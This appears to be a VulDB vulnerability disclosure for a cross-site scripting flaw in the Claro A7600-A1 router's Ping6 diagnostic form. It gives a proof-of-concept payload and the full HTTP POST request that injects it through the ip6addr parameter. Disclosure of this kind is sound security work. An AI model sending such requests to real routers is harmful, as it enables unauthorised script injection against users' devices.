| Field | Value |
|---|---|
| Title | Claro A7600-A1 Wlan Router RNR4-A72T-2x16_v2110403_CLA_32_160817 Cross Site Scripting |
| Description | In the file 'index.htm', at the path '/index.htm', an unrestricted Cross-Site Scripting (XSS) and injection vulnerability exists in the "Claro A7600-A1" system, specifically in the 'Ping6 Diagnóstico' parameter. The function executes the user-supplied parameter without validation. Malicious attackers can leverage this vulnerability to access sensitive client information. |

Script: `<img/src/onerror=prompt(8)>`

Request:

```http
POST /form2pingv6.cgi HTTP/1.1
Host: xx.xx.xx.xx
Content-Length: 94
Cache-Control: max-age=0
Accept-Language: en-US,en;q=0.9
Origin: http://xx.xx.xx.xx
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://xx.xx.xx.xx/ping_v6.htm?v=1740751210000
Accept-Encoding: gzip, deflate, br
Connection: keep-alive

ip6addr=%3Cimg%2Fsrc%2Fonerror%3Dprompt%288%29%3E+&interface=&submit.htm%3Fpingrlt_v6.htm=Send
```

| Field | Value |
|---|---|
| Source | http://x.x.x.x/index.htm |
| User | Havook (UID 71104) |
| Submission | 28.02.2025 15:02 (1 year ago) |
| Moderation | 11.03.2025 07:51 (11 days later) |
| Status | Accepted |
| VulDB Entry | 299216 [Claro A7600-A1 RNR4-A72T-2x16_v2110403_CLA_32_160817 Ping6 Diagnóstico /form2pingv6.cgi ip6addr Cross Site Scripting] |
| Points | 17 |